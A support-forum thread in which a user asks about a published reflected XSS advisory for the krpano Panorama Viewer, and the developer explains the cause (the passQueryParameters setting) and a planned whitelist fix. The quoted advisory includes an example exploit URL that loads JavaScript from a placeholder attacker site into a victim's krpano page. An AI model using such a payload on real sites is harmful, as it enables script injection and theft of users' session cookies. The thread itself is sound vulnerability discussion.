You are not logged in.

1

Friday, March 19th 2021, 4:40am

XSS in krpano Panorama Viewer

Hi there,

I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.

I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer
Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
Thank you,

Details below:

*XSS in **krpano Panorama Viewer *
CVSS Severity: *Medium*
CVSS Score: *6.1*
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PRCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N:N/UI:R/S:C/C:L/I:L/A:N
<https://www.first.org/cvss/calculator/3.…S:C/C:L/I:L/A:N>

*Description*
krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
Scripting (XSS) vulnerability caused by improper validation of user
supplied input when loading remote js and XML files in the default
installation (krpano.html).

*Impact*
A remote attacker could exploit this vulnerability using a specially
crafted URL to execute a script in a victim's Web browser within the
security context of the hosting Web site, once the URL is clicked or
visited. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials, force malware execution, user
redirection and others.

*Steps to Reproduce*
Exploit example, from documentation tutorials:
http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=[align=center&plugin[test].onclick=dosomething]https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething[/align](hello,plugin)&onstart=showlog();

*Fix*
Block remote load of js and XML files. Contact the vendor.

2

Friday, March 19th 2021, 9:34am

First.. the *Steps to Reproduce* exploit example is messed up and not correct.

you could inject a js plugin by url if passQueryParameters is true (the default is false)
https://krpano.com/docu/html/#passQueryParameters

but this working crossdomain is unlikely...
even if so, this should be configurable using security / CORS
https://krpano.com/docu/xml/#security

My guess is this is a bogus alert

This post has been edited 10 times, last edit by "indexofrefraction" (Mar 19th 2021, 12:43pm)


3

Saturday, March 20th 2021, 11:41am

Hi,

this is known and is about the 'passQueryParameters' setting:
https://krpano.com/docu/html/#passQueryParameters

When it is enabled any kind of code can be passed to the viewer, that is what it is made for.
When disabled, nothing can be injected of course.

But to improve that feature and to make it more safe, in the next release (version 1.21) the passQueryParameters setting then also allows to set a 'whitelist' of variables that can be passed.

E.g. this way:

Source code

1
embedpano({..., passQueryParameters:"startscene,startlookat"});
Then only the 'startscene' and 'startlookat' parameters can be passed and all others will be ignored.

When XSS is an actual problem in your usage case, make sure that passQueryParameters is set to false.
And if you need to pass parameters via the url, then this would need to be done manually (use JS code to parse the query string and pass the custom parameters via the krpano JS API, I can make an example if required).

Best regards,
Klaus